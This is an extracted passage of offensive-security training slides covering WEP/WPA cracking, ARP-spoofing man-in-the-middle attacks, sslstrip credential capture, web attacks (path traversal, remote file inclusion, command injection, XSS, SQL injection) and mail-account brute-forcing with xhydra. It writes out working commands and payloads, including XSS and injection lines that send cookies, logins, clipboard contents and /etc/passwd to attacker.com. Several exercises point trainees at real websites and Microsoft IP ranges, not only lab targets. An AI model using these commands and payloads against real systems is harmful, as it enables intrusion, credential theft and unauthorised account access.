255.255.255.255 -y fragment-* -w /tmp/aircrack-arp-request
•
Inject Packets:
•
aireplay-ng --interactive -F -r /tmp/aircrack-arp-request <INTERFACE>
Wireless Intrusion – Breaking WEP
•
Data packages should increase quite fast (~500/sec)
•
Using aircrack-ng to crack the key
aircrack-ng -z /tmp/aircrack-cap-*.cap
191
Wireless Intrusion – Breaking WEP
192
•
Bringing the network up with the key
•
To verify that the correct key has been recovered, abort aireplay-ng and airodump-ng
•
Reset Wireless Card:
•
•
Configure Network:
•
•
airmon-ng stop wlan0
iwconfig wlan0 essid <ESSID> enc <WEPKEY>
Activate Card:
•
ifconfig wlan0 up
Wireless Intrusion – Breaking WEP
•
Graphical alternative in Backtrack: WICD
•
WICD is a wireless network manager for Linux
193
Wireless Intrusion – Breaking WEP
Hands-On:
194
Wireless Intrusion – Breaking WEP
Hands-On:
•
Break the WEP encryption by the trainers given access point
•
Connect to the access points network
•
Which attack worked?
•
Is a MAC filter active?
195
Table of Content
196
•
Wireless Intrusion
•
•
•
•
Wireless Basics
Breaking WEP
Breaking WPA
Credential Sniffing
Wireless Intrusion – Breaking WPA
Hands-On:
197
Wireless Intrusion – Breaking WPA
Hands-On:
•
Start kismet
•
Choose available WPA encrypted network(s)
•
What we need to note down:
•
Channel
•
BSSID
•
(E)SSID
•
Own MAC
•
Connected Clients (press "c" in kismet)
198
Wireless Intrusion – Breaking WPA
•
Wireless card into monitor mode to sniff packets
•
•
airodump-ng -c <CHANNEL> --bssid <BSSID> -w outputfile <INTERFACE>
Wait for WPA Handshake (Can be enforced using deauthentication attack)
•
•
airmon-ng start <INTERFACE> <CHANNEL>
Logging the traffic
•
•
199
aireplay-ng –-deauth=5 -a <BSSID> -c <CLIENT_MAC> <INTERFACE>
Using aircrack-ng to brute-force the key
•
aircrack-ng –w <WORDLIST> /tmp/aircrack-cap-*.cap
Wireless Intrusion – Breaking WPA
Hands-On:
200
Wireless Intrusion – Breaking WPA
Hands-On:
•
Break the WPA encryption by the trainers given access point
•
Connect to the access points network
•
Which attack worked?
201
Table of Content
202
•
Wireless Intrusion
•
•
•
•
Wireless Basics
Breaking WEP
Breaking WPA
Credential Sniffing
Wireless Intrusion – Credential Sniffing
•
Kismet gives us the possibility of getting all credentials in plain-text
•
As
•
•
We are already in the Wireless Network
•
The Wireless Network is open
Kismet stores its logs in
•
/var/log/kismet/*.dump
•
First locking into the Channel of the target Wireless with Kismet
•
See the menu how to lock a channel and view all sniffed packages
203
Wireless Intrusion – Credential Sniffing
•
Kismet “Data Strings Dump”
204
Wireless Intrusion – Credential Sniffing
•
We can use a combination of kismet & Wireshark as an Analyzer
•
Wireshark (formerly known as Ethereal)
•
Most famous Sniffer in the world
•
Freeware
•
http://www.wireshark.org/
205
Wireless Intrusion – Credential Sniffing
•
Loading the *.dump into Wireshark
206
Table of Content – Complete Overview
207
1.
Overview
2.
Footprinting
3.
Server Intrusion
4.
Client-Side Intrusion
5.
Wireless Intrusion
6.
Wired Intrusion
7.
Web Application
8.
Miscellaneous Attacks
Table of Content
208
•
Wired Intrusion
•
•
•
Man-in-the-Middle
Credential Sniffing
SSL Breakdown
Wired Intrusion – Man-in-the-Middle
•
Credential Sniffing with Man-in-the-Middle attack
•
What is a Man-in-the-Middle attack?
•
209
Active attack where the attacker attempts to intercept, read or alter information moving between two
computers
•
ARP cache is modified
•
Diverting original traffic
Wired Intrusion – Man-in-the-Middle
•
What is a Man-in-the-Middle attack?
210
Wired Intrusion – Man-in-the-Middle
•
Target ARP table before Man-in-the-middle
•
Router MAC: 192.168.1.1 -> 00:25:9C:48:07:36
211
Wired Intrusion – Man-in-the-Middle
•
Command line
•
•
arpspoof
Tools including credential sniffing
•
Dsniff
• Not developed anymore since 2000
•
Cain & Abel
• Windows Application
• http://www.oxid.it/cain.html
•
Ettercap
• Linux Application
• Console & GUI
• http://ettercap.sourceforge.net/
212
Table of Content
213
•
Wired Intrusion
•
•
•
Man-in-the-Middle
Credential Sniffing
SSL Breakdown
Wired Intrusion – Credential Sniffing
•
Ettercap-NG
•
Multi Platform
•
Linux, *BSD, MacOS, Windows
•
Plugin management
•
No update since 2005
214
Wired Intrusion – Credential Sniffing
215
Updating Backtrack 5
# aptitude update
# aptitude safe-upgrade
First prepare Ettercap for Man-in-the-Middle
•
Change privileges for SSL (65534 to 0) in /etc/etter.conf
(remove the # in front)
[privs]
•
ec_uid = 0
# nobody is the default
ec_gid = 0
# nobody is the default
Uncommenting two lines in /etc/etter.conf
(remove the # in front)
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Wired Intrusion – Credential Sniffing
•
Ettercap GUI
216
Wired Intrusion – Credential Sniffing
•
Switching to Sniffing Mode
•
“Sniff” -> “Unified Sniffing” -> Choosing the Interface (e.g. wlan0 in a wireless environment)
217
Wired Intrusion – Credential Sniffing
•
Looking for active hosts in the network
•
“Hosts” -> “Scan for hosts” -> e.g. “5 hosts added to the hosts list…”
218
Wired Intrusion – Credential Sniffing
•
Viewing the discovered hosts
•
“Hosts” -> “Hosts list”
•
192.168.1.1 -> Router / Gateway
•
192.168.1.103 -> Target!
219
Wired Intrusion – Credential Sniffing
•
Starting the Man-in-the-Middle
•
•
“Mitm” -> “ARP Poisoning”s
Credential Sniffing is now active
220
Wired Intrusion – Credential Sniffing
•
Looking at the Target
•
Before: Router MAC: 192.168.1.1 -> 00:25:9C:48:07:36
•
After: Router MAC: 192.168.1.1 -> 00:21:6A:7F:68:04
•
The same MAC address as the attackers’ – redirection works!
221
Wired Intrusion – Credential Sniffing
•
Target now logs into www.youtube.com
•
Username: blub
•
Password: asfsadf
222
Wired Intrusion – Credential Sniffing
Hands-On:
223
Wired Intrusion – Credential Sniffing
Hands-On:
•
Setup Ettercap
•
Start Man-in-the-middle
•
Target PC logs in to various Websites
•
Does it work? What works?
•
Which limitations?
224
Table of Content
225
•
Wired Intrusion
•
•
•
Man-in-the-Middle
Credential Sniffing
SSL Breakdown
Wired Intrusion – SSL Breakdown
•
Problem with Man-in-the-Middle SSL traffic
•
How to avoid SSL Certificate warnings?
•
Using sslstrip
•
Developed in 2009
•
Watches for HTTPS links
•
Redirects HTTPS links to HTTP
•
http://www.thoughtcrime.org/software/sslstrip/
226
Wired Intrusion – SSL Breakdown
Problem with Man-in-the-Middle on SSL is the Certificate warning
•
Firefox 3.6
227
Wired Intrusion – SSL Breakdown
Problem with Man-in-the-Middle on SSL is the Certificate warning
•
Internet Explorer 8
228
Wired Intrusion – SSL Breakdown
First prepare applications for Man-in-the-Middle
•
Prepare SSLStrip
ln -s /pentest/web/sslstrip/sslstrip.py sslstrip
•
Linux Kernel IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
•
Setup iptables to intercept HTTP requests for sslstrip
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
229
Wired Intrusion – SSL Breakdown
Using arpspoof for packet redirection
•
Command
arpspoof -i <interface> -t <target IP> <gateway IP>
•
Example in Wireless network
arpspoof -i wlan0 -t 192.168.1.106 192.168.1.1
230
Wired Intrusion – SSL Breakdown
Start sslstrip for stripping HTTPS
•
Command
sslstrip –p –f –k –w /root/Desktop/sslstrip.log
•
Log only SSL POST (instead of having all HTTP traffic)
•
•
Emulate the SSL favicon
•
•
-f
Kill active SSL session of the target to force relogin
•
•
-p
-k
Write all traffic to sslstrip.log
•
-w <filename>
231
Wired Intrusion – SSL Breakdown
•
No HTTPS anymore
•
SSL Favicon
232
Wired Intrusion – SSL Breakdown
•
233
Checking the logfile sslstrip.log
SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3
F&service=mail&rm=false&dsh=3086128579327401111&ltmpl=default&ltmpl=default&scc=1&timeStmp=&secTok=&GALX
=APDKuj6HaBM&[email protected]&Passwd=mYpasSw0rd&rmShown=1&signIn=Sign+
in&asts=
Wired Intrusion – SSL Breakdown
Hands-On:
234
Wired Intrusion – SSL Breakdown
Hands-On:
•
Setup arp-spoofing for your target PC
•
Start sslstrip
•
Break SSL down
•
Does it work?
•
Passwords in the logfile?
235
Table of Content – Complete Overview
236
1.
Overview
2.
Footprinting
3.
Server Intrusion
4.
Client-Side Intrusion
5.
Wireless Intrusion
6.
Wired Intrusion
7.
Web Application
8.
Miscellaneous Attacks
Table of Content
237
•
Web Application
•
•
•
•
•
•
•
Overview
Basics
Code Exposure
Input Validation
CGI applications
Cross Site Scripting
SQL Injection
Web Application – Overview
•
238
Due to the development of the world wide web, lots of new techniques have been
developed & discovered to attack CGI applications and clients
•
Webservers and CGI applications have to be reachable
•
Webservers are often the easiest entry point
•
Thanks to PHP there are new vulnerabilities discovered every day
Table of Content
239
•
Web Application
•
•
•
•
•
•
•
Overview
Basics
Code Exposure
Input Validation
CGI applications
Cross Site Scripting
SQL Injection
Web Application – Google Hacking
•
http://www.google.com/advanced_search
•
http://www.google.com/intl/en/help/cheatsheet.html
•
link:
Results that link to that website
•
cache:
Search the cache
•
site:
Limit to this site only (website or domain)?
•
inurl:, allinurl:
Search hit has to be in URL
•
intitle:, allintitle:
Search hit has to be in title
•
filetype:
Searches all files of this type
240
Web Application – Google Hacking
•
Good examples in The Google Hacking Database:
http://www.exploit-db.com/google-dorks/
•
Public WebCams – e.g.
•
•
Front Page User Logins - See the login files for front page users
•
•
inurl:_vti_pvt "service.pwd“
Network Printers – View the status and even print off of printers remotely
•
•
intitle:"Live View / - AXIS"
intext:centreware inurl:status
Administrator Access - View and alter websites through phpMyAdmin
•
intitle:phpMyAdmin "Welcome to phpMyAdmin *" "running on* as [email protected]*"
241
Web Application – Robots.txt
•
Used to deny indexing of specific parts of a website by automated robots like Google
Bot
•
Location: <URL>/robots.txt, e.g.:
http://www.finfisher.com/robots.txt
•
242
Commonly used – thanks to aggressive indexing by modern search engines
Web Application – Robots.txt
•
Example:
User-agent: *
Disallow: /www-preview/
Disallow: /admin/
Disallow: /common/
243
Web Application – Robots.txt
•
Example:
User-agent: *
Disallow: /attachements/
[…..]
Disallow: /studiomail/
[…]
Disallow: /studiomailfrontend.cfm
[…]
244
Web Application – Robots.txt
•
Example:
User-agent: *
Disallow: /admin/
Disallow: /admin/Security/
[…]
245
Web Application – Robots.txt
Hands-On:
246
Web Application – Robots.txt
Hands-On:
•
Visit some known (target) Websites
•
•
Example: https://www.microsoft.com/robots.txt
Check for robots.txt on the domain
•
Interesting data?
•
Any admin / mail interfaces?
247
Web Application – Default Passwords
•
Many devices, router & printer use default configuration
•
Therefore default username & password combinations are often used
•
Different lists exist for this (e.g. http://www.phenoelit-us.org/dpl/dpl.html)
248
Web Application – Social Network Security
•
Many Social Networks are prone to vulnerabilities
•
http://socialnetworksecurity.org/en/index.php
249
Web Application – Hidden Directories
•
Some very common hidden directories:
•
/admin
•
/phpMyAdmin
•
/mail
•
/webmail
•
/email
•
/webalizer
•
/stats
•
/login
250
Web Application – Hidden Directories
•
Some open source application are good in directory findings
•
Nikto2
•
•
Very established but old web security scanner
•
http://cirt.net/nikto2
Skipfish
•
Very new web security scanner of Google
•
Extremely fast
•
Self learning dictionary wordlist
•
https://code.google.com/p/skipfish/
251
Web Application – Hidden Directories
Hands-On:
252
Web Application – Hidden Directories
Hands-On:
•
Choose some known (target) website
•
Run nikto on target website
•
Interesting directories?
•
Vulnerabilities found?
•
Any admin / webmail interfaces?
253
Table of Content
254
•
Web Application
•
•
•
•
•
•
•
Overview
Basics
Code Exposure
Input Validation
CGI applications
Cross Site Scripting
SQL Injection
Web Application – Code Exposure
•
Sometimes developer leave to many information within the source code
•
Sometimes developer even provide credentials in clear-text
•
“View page source” often discloses information
•
Client-side scripts & applications are in control of the client
•
•
JavaScript
•
Flash
All client-side authentication & protection can easily be bypassed
255
Web Application – Code Exposure
•
Example: Martial Arts Website in Munich – Admin Interface
256
Web Application – Code Exposure
•
Example: Martial Arts Website in Munich – Sourcecode
•
Uncommented line linking to “pass.php”
257
Web Application – Code Exposure
•
Example: Martial Arts Website in Munich – pass.php
•
Web server exposes user ids & passwords (hashed) within the file
258
Web Application – Code Exposure
•
MD5 Hashes online
•
http://www.hashkiller.com
•
Searches through dozens of websites and has own huge database!
•
“Webcrack” requires Account
259
Web Application – Code Exposure
Hands-On:
260
Web Application – Code Exposure
Hands-On:
•
Take the challenge by yourself
•
Visit the provided URL
•
Solve the Web Hack-It
•
Stage 1
• Code Exposure
•
Stage 2
• Hidden Directory
261
Table of Content
262
•
Web Application
•
•
•
•
•
•
•
Overview
Basics
Code Exposure
Input Validation
CGI applications
Cross Site Scripting
SQL Injection
Web Application – Input Validation
•
There are various techniques to bypass input validation like “is a valid e-mail“ checks,
etc.
•
263
All client side validation can easily be bypassed / modified
Web Application – Input Validation
•
Examples
// returns true if the string is a valid e-mail
function isEmail(str){
if(isEmpty(str)) return false;
var re = /^[^\s()<>@,;:\/][email protected]$/i
return re.test(str);
}
// returns true if the string is a US phone number formatted as...
// (000)000-0000, (000) 000-0000, 000-000-0000, 000.000.0000, 000 000 0000, 0000000000
function isPhoneNumber(str){
var re = /^$?[2-9]\d{2}[$\.-]?\s?\d{3}[\s\.-]?\d{4}$/
return re.test(str);
}
// returns true if the string only contains characters A-Z, a-z or 0-9
function isAlphaNumeric(str){
var re = /[^a-zA-Z0-9]/g
if (re.test(str)) return false;
return true;
}
264
Web Application – Input Validation
•
265
Most input restrictions can be bypassed by saving the website to disk and
manipulating the functions using a text-editor and load the local, modified
version into the web browser
Original
Modified
// returns true if the string is a valid e-mailfunction
// returns true if the string is a valid e-mailfunction
isEmail(str) {
isEmail(str) {
return true;
if(isEmpty(str))
return false;
var re = /^[^\s()<>@,;:\/[email protected]$/i
return re.test(str);
}
}
Web Application – Input Validation
•
Software that is used as a proxy by the Web browser
•
Any modification is possible before information reaches its final destination
•
Replacements of any kind are possible, including:
•
Modification of cookies
•
Modification of HTTP requests (POST & GET)
•
Modification of variables and form fields
•
Bypassing any client side validation
266
Web Application – Input Validation
•
Interception Proxies can help – Paros
•
On-the-fly interception and modification
•
Support of different authentications
•
Spider functionality
267
Web Application – Input Validation
•
Concept of Interception through Paros Proxy
1.
The Attacker sends a request to the Paros Proxy.
2.
The Paros Proxy connects the HTTP Server.
3.
The HTTP Server sends back the answer to the Paros Proxy.
4.
Code is being modified
5.
The Paros Proxy sends back this answer to the Attacker.
268
Web Application – Input Validation
•
Starting Paros – Main Screen
269
Web Application – Input Validation
•
Starting Paros – Configure for Interception
•
Enable “Trap request” and “Trap response” in “Trap Window”
270
Web Application – Input Validation
•
271
Paros will now intercept all traffic and using the buttons “Continue” or “Drop” you can
pass the requests to their destination, or drop them
•
Paros Proxy runs on localhost on Port 8080
•
We need to configure our Browser to use this proxy
Web Application – Input Validation
•
Paros Proxy – Firefox
272
Web Application – Input Validation
Paros Proxy – Firefox
1. In Firefox “Edit” -> “Preferences”
2. “Advanced”
3. “Network” tab
4. “Settings” button
5. Configuration
•
HTTP Proxy: localhost
•
Port: 8080
•
Check on “Use this proxy server for all protocols”
273
Web Application – Input Validation
Paros Proxy – Google.com Example
1. HTTP Header
2. HTTP Data
3. “Continue” to see the next packet
274
Web Application – Input Validation
Hands-On:
275
Web Application – Input Validation
276
Hands-On:
•
Start the Paros Proxy
•
Configure Paros Proxy & Browser
•
Solve Hack-It Stage 1 again using Paros this time.
•
Try to modify values and/or code in the right part of Paros before you hit “Continue”
Web Application – Input Validation
Hands-On:
•
Get familiar with this basic interception procedure
•
Solve the Web Hack-It
•
Stage 3
• Input Validation
•
Stage 4
• HTTP Header Manipulation
•
Stage 5
• Router Access
277
Table of Content
278
•
Web Application
•
•
•
•
•
•
•
Overview
Basics
Code Exposure
Input Validation
CGI applications
Cross Site Scripting
SQL Injection
Web Application – CGI applications
•
279
What is CGI?
•
Abbreviation of Common Gateway Interface
•
Specification for transferring information between a Web server and a CGI program
•
The program could be written in any programming language, including
•
PHP
•
ASP
•
Perl
•
Java
•
Python
•
Ruby
•
Etc.
Web Application – CGI applications
•
There are several types of attacks against CGI applications:
•
File-read: Read files from the remote web server
•
File-execute: Execute applications on the remote web server
•
File-upload: Upload/Include custom code
•
Restriction-bypass: Bypass authentication
280
Web Application – CGI applications
281
Modification Of Variables
•
State variables are often used to distinguish between authentication states or user
rights
•
ID Variables are often used to distinguish between different orders, users or products
•
Often variables are stored in the cookie for later usage
Web Application – CGI applications
282
Simple Variable Weakness #1
•
Due to the lack of a proper variable state initialization, we can define the state of the
variable:
http://www.example.com/index.php?auth=1
•
These variables are often stored in cookies
index.php:
<?php
if ($pass == "some_secret_pass")?
$auth= 1;
if ($auth == 1)?
echo "logged in successfully";
?>
Web Application – CGI applications
Simple Variable Weakness #2
•
Offers, customers and products often have numeric values
•
Some applications still relay on these numbers. This makes it possible to read
someone’s order or offer by increasing or guessing a value within a variable
•
These variables are often stored in cookies, especially customer IDs
•
Example
•
http://www.example.com/show-offer.asp?id=2345
283
Web Application – CGI applications
Remote File Read
•
Many CGI scripts read local files according to the selection
•
Example:
•
www.example.com/ikonboard/help.cgi?helpon=user
•
Will read and show “user.html“
•
www.example.com/ikonboard/help.cgi?helpon=../../../etc/passwd%00
•
Will read and show the password file
284
Web Application – CGI applications
285
Remote Code Inclusion – PHP #1
•
Variable include/require statements are dangerous
•
PHP applications with unsafe include() and require() calls are affected, because PHP
allows remote URL’s within those calls:
•
Example:
•
http://www.victim.com/index.php?action=logout.php
•
The vulnerable code looks like this:
index.php:
<?php
include $_GET['action'];
?>
Web Application – CGI applications
286
Remote Code Inclusion – PHP #2
•
A simple PHP command execution script is put to a web server:
cmd.php: <?php system($c) ?>
•
When the request below is sent, the web server of the target includes our PHP script
and passes our command to it:
•
http://www.victim.com/index.php?action=http://www.attacker.com/cmd.php?c=ls
Web Application – CGI applications
287
Remote Code Inclusion
•
Sometimes it's possible to use/abuse upload scripts to upload custom CGI/PHP scripts
to the remote web server
•
Some other places to include custom codes which will be executed by the Webserver
are guestbook's, forums, etc.
Web Application – CGI applications
288
NULL-Byte Injection
•
NULL (\0) is often used to terminate strings within applications
•
NULL bytes can be used to remove file extensions if user supplied data is used for
filenames and a fixed extension is added by the application:
•
www.codito.de/ikonboard/help.cgi?helpon=../../../etc/passwd
Reads /etc/passwd.html (Not found)?
•
www.codito.de/ikonboard/help.cgi?helpon=../../../etc/passwd%00
Reads /etc/passwd (Found)
Web Application – CGI applications
289
Character Injection
•
CRLF (\r\n) could invoke a second command if user-supplied data is passed to the
command line
•
;, &, &&, |, || and ` can also trigger a second, custom command to be executed
•
Script executes command:
system(“cat welcome_mail.txt | mail <USER-SUPPLIED DATA>“);
•
Using the following string as the e-mail address will send us the original mail and the
password file:
[email protected] && mail [email protected] < /etc/passwd
Web Application – CGI applications
Hands-On:
290
Web Application – CGI applications
Hands-On:
•
Solve the Web Hack-It
•
Stage 6
• Cookie Manipulation
•
Stage 7
• Code Inclusion
•
Stage 8
• Local File Inclusion
291
Table of Content
292
•
Web Application
•
•
•
•
•
•
•
Overview
Basics
Code Exposure
Input Validation
CGI applications
Cross Site Scripting
SQL Injection
Web Application – Cross Site Scripting
•
293
Cross Site Scripting (called XSS) is a technique do insert custom HTML/JavaScript/etc.
code into a remote website
•
There a mainly 2 ways:
•
Persistent: Code is inserted into the remote website using a guestbook, forum, etc.
•
Non persistent: Code is inserted into the remote website using a specially crafted link and have users
clicking it
•
http://www.xssed.com/archive/special=1/
•
•
List of famous & government websites with XSS
Reference: XSS Cheat Sheet
•
http://ha.ckers.org/xss.html
Web Application – Cross Site Scripting
•
Example – USA election:
294
Web Application – Cross Site Scripting
295
•
Indirect impact:
•
HTML or JavaScript code will be entered in a guest book. Every time someone opens
the guestbook, the code will be interpreted by the viewers web browsing engine
•
Error messages will be logged to a text file. Instead of simple generating a message like
“test.txt File not found”, messages like “<script>alert(“test”);</script> will be
generated. When the log viewer application interprets the lines in the text file, the
code might be executed
Web Application – Cross Site Scripting
•
Affected parts of an application
•
Every part of an application can be vulnerable to injection attacks depending on its processing of
information
•
•
Any variables, form fields, cookies and components are candidates to be abused for this attack
Missing input validation is the source of this attack
296
Web Application – Cross Site Scripting
Discovery of XSS
•
The discovery of possible attack vectors can be done manually or automated
•
Manual analyzing:
•
What input possibilities are available within an application?
•
How is the data processed?
•
Try to modify input fields with common test strings.
•
Modify the attack string to do something useful!
297
Web Application – Cross Site Scripting
298
Advanced XSS
•
Reading the clipboard of clients using the Internet Explorer through XSS (e.g. using a
fake image tag)
•
The attackers dumb script simply writes the given data to a log file on the remote
server:
<script>
data = clipboardData.getData("Text");
img = '<img src="http://www.attacker.com/clipdump.php?payload=
' + escape(data) + '&referrer={$refer}' + '&host{$ip}" width=1
document.write(img);
</script>
height=1>';
Web Application – Cross Site Scripting
299
Advanced XSS
•
A XSS bug in a login page in combination with the victim using the browsers "passwordsafe" enables attackers to steal login data.
<script>
function hack() {
url = 'http://www.attacker.com/logindump.php?u=' +
document.form.username.value + '&p=' + document.form.pw.value;
};
location.href=url;
setTimeout(hack,2000);
</script>
Web Application – Cross Site Scripting
300
Advanced XSS
•
The victim uses a webmailer, e.g. yahoo.com and does not log out, so his session is still
active
•
The victim visits some XSS poisoned site that expects yahoo.com users to still be logged
on and sends mails using their account/browser:
<img src="http://[email protected]
Web Application – Cross Site Scripting
301
Session Hijacking using Cookies
•
Many of the current session management systems are based on cookies, storing the
session ID at client side
•
The cookies can be read and transferred using JavaScript
•
The stolen cookie content will then be used by the attacker
<script>
top.load('http://www.attacker.com/cookiedump.php?c=' +
</script>
document.cookie
Web Application – Cross Site Scripting
Hands-On:
302
Web Application – Cross Site Scripting
Hands-On:
•
Search for some target sites with input forms
•
Try some basic XSS
•
Sites vulnerable?
303
Table of Content
304
•
Web Application
•
•
•
•
•
•
•
Overview
Basics
Code Exposure
Input Validation
CGI applications
Cross Site Scripting
SQL Injection
Web Application – SQL Injection
•
305
All databases are affected
•
MySQL
•
Microsoft SQL
•
PostgreSQL
•
Oracle
•
etc…
•
The problem is not the database itself, it's the absence of input validation
•
An attacker tricks an application into running an arbitrary SQL query by appending
extra SQL elements to the query that was intended to be executed by the database
application
Web Application – SQL Injection
•
306
Simple detection is possible by supplying characters that will modify the intended SQL
query :
•
'
•
"
•
--
•
;
•
||
Web Application – SQL Injection
Simple SQL Injection example:
•
URL
http://www.victim.com/[email protected]
•
PHP Code
<?php
mysql_query('SELECT name FROM users WHERE mail='.$_GET['e-mail']);
?>
•
SQL Query
SELECT name FROM users WHERE mail=’[email protected]’
307
Web Application – SQL Injection
Simple SQL Injection example:
•
URL
http://www.victim.com/senddetails.php?mail=“something' or 1=1;“
•
PHP Code
<?php
mysql_query('SELECT name FROM users WHERE mail='.$_GET['e-mail']);
?>
•
SQL Query
SELECT name FROM users WHERE mail='something' or 1=1;
308
Web Application – SQL Injection
Depending of the query, the following injections might work:
•
' or 1=1--
•
" or 1=1--
•
or 1=1--
•
' or ‘1'=‘1
•
" or “1"=“1
•
') or (‘1'=‘1
309
Web Application – SQL Injection
•
310
Instead of just sending the related login details for the [email protected] user, the
application will return the details for all users in the database as 1=1 is always true
•
The amount of abuse possibilities on the different database products is depending on
their feature set or dialect of SQL, their macros (stored procedures) and/or their
architecture
•
Sub SELECT, VIEW and UNION commands are used to gather more information as intended
•
INSERT or ALTER commands are used for writing onto databases
•
Store procedures are product specific but very powerful
•
System commands for system overtake!
Web Application – SQL Injection
SQL UNION:
•
UNION combines SQL queries
•
Original query:
•
•
SELECT name, age FROM family;
Modified query:
•
SELECT name, age FROM family UNION SELECT username,password FROM users;
311
Web Application – SQL Injection
312
Summary
•
SQL injection could take up to multiple days/weeks/month of training for a single
product / platform. It is diverse, depending on the database product used
•
If you need to test a certain application you should try to find out what database
application is running and refer to the existing technical publications
•
No magic potion here
Web Application – SQL Injection
Hands-On:
313
Web Application – SQL Injection
Hands-On:
•
Solve Web Hack-It Stage 9
•
Solve Web Hack-It Stage 10
•
Combination of everything learned!
314
Table of Content
315
1.
Overview
2.
Footprinting
3.
Server Intrusion
4.
Client-Side Intrusion
5.
Wireless Intrusion
6.
Wired Intrusion
7.
Web Application
8.
Miscellaneous Attacks
Table of Content
316
•
Miscellaneous Attacks
•
Breaking E-Mail Accounts
Miscellaneous Attacks – Breaking E-Mail Accounts
•
No reliable method to get in!
•
Bruteforce possible
•
Dictionary attack is most efficient
•
Predefined wordlists
•
Own wordlists
317
Miscellaneous Attacks – Breaking E-Mail Accounts
•
Example target:
•
•
Any @microsoft.com
Need to know:
•
Many E-Mail addresses
•
POP3/IMAP4 Server for E-Mail retrieval
318
Miscellaneous Attacks – Breaking E-Mail Accounts
Need to know the POP3(S)/IMAP4(S) Server
•
Not always 100% possible to find out
•
Even if – sometimes remote POP3/IMAP4 connections are forbidden
•
Possibly the same IP/Hostname like SMTP address
•
Domain Bruteforce
•
Scanning network range
319
Miscellaneous Attacks – Breaking E-Mail Accounts
Possibly the same IP/Hostname like SMTP address
•
Check for the MX (DNS entry for Mail) record
$ host -t MX microsoft.com
microsoft.com mail is handled by 10 mail.messaging.microsoft.com.
•
Checking if this host also responds to POP3(S)/IMAP(S)
nmap –p 110,143,993,995 mail.messaging.microsoft.com
320
Miscellaneous Attacks – Breaking E-Mail Accounts
Domain Bruteforce
•
dnsenum
can be used
•
DNS Name enumeration
•
Multiple discovery techniques
•
BT5: /pentest/enumeration/dns/dnsenum/
Usage:
./dnsenum –f dns.txt microsoft.com
Look out for hostnames like:
•
email.*
•
mail.*
•
pop.*
321
Miscellaneous Attacks – Breaking E-Mail Accounts
Scanning Network Range
•
The POP3/IMAP4 server is often in the same IP range like the domain
•
Example www.microsoft.com
# ping microsoft.com
PING microsoft.com (207.46.232.182) 56(84) bytes of data.
•
Check the IP range for POP3/IMAP4 server with nmap:
# nmap –p 110,143,993,995 207.46.232.1-254
322
Miscellaneous Attacks – Breaking E-Mail Accounts
Hands-On:
323
Miscellaneous Attacks – Breaking E-Mail Accounts
Hands-On:
•
Choose some target
•
Try to find out the POP3/IMAP4 Mail server
324
Miscellaneous Attacks – Breaking E-Mail Accounts
Generating Dictionary – Predefined Wordlists
•
Many wordlists are free to download
•
http://www.packetstormsecurity.org/Crackers/wordlists/
•
Categorized wordlists
•
•
Common Words
•
Languages
•
Religion
•
Movies
•
Etc.
Millions of words!
325
Miscellaneous Attacks – Breaking E-Mail Accounts
Generating Dictionary – Predefined Wordlists
•
Pro
•
•
Much higher success rate
Contra
•
May take a long time to find the correct password
326
Miscellaneous Attacks – Breaking E-Mail Accounts
Generating Dictionary – Own Wordlists
•
Creating wordlists with simple passwords
•
Many people use passwords like:
•
123456
•
Password
•
asdfgh
•
123qwe
•
abc123
327
Miscellaneous Attacks – Breaking E-Mail Accounts
Generating Dictionary – Predefined Wordlists
•
Pro
•
•
Very fast results
Contra
•
Low(er) success rate
328
Miscellaneous Attacks – Breaking E-Mail Accounts
Hands-On:
329
Miscellaneous Attacks – Breaking E-Mail Accounts
Hands-On:
•
Create wordlist
•
Choose around 30 passwords
•
Save for later use
330
Miscellaneous Attacks – Breaking E-Mail Accounts
How to get E-Mail addresses
•
Searching with Maltego
•
*@microsoft.com
331
Miscellaneous Attacks – Breaking E-Mail Accounts
How to get E-Mail addresses
•
Using Google Search
mailto: "@microsoft.com"
•
Using Google Mail Enum
goog-mail.py microsoft.com
332
Miscellaneous Attacks – Breaking E-Mail Accounts
Hands-On:
333
Miscellaneous Attacks – Breaking E-Mail Accounts
Hands-On:
•
Choose some target
•
Collect 5 to 10 E-Mail addresses
334
Miscellaneous Attacks – Breaking E-Mail Accounts
•
After
•
Finding some E-Mail addresses
•
Finding the corresponding POP3/IMAP4 server
•
Creating a password wordlist
•
Start to attack the mail postboxes
•
Using xhydra for Bruteforce
335
Miscellaneous Attacks – Breaking E-Mail Accounts
•
•
xhydra
•
Very fast logon cracker
•
Multiple protocols like POP3, HTTP, FTP, MYSQL, etc.
Good and easy to use GUI
336
Miscellaneous Attacks – Breaking E-Mail Accounts
•
xhydra – Target
1. IP/Domain of POP3 Server
2. Protocol = POP3
3. Show Attempts = We see each attempt in the Log
337
Miscellaneous Attacks – Breaking E-Mail Accounts
•
xhydra – Target
1. Created list of users
2. List of passwords
3. Try username as password
338
Miscellaneous Attacks – Breaking E-Mail Accounts
•
xhydra – Target
1. Parallel attempts per second = depends on connection = 3 - 5 suggested
339
Miscellaneous Attacks – Breaking E-Mail Accounts
•
xhydra – Target
•
Output window
If password is found – it will be displayed in bold characters
340
Miscellaneous Attacks – Breaking E-Mail Accounts
Hands-On:
341
Miscellaneous Attacks – Breaking E-Mail Accounts
Hands-On:
•
Trainer will give domain name!
•
Use xhydra to bruteforce logins
342
Vielen Dank für die Aufmerksamkeit
Questions?
Thank you for your attention!
343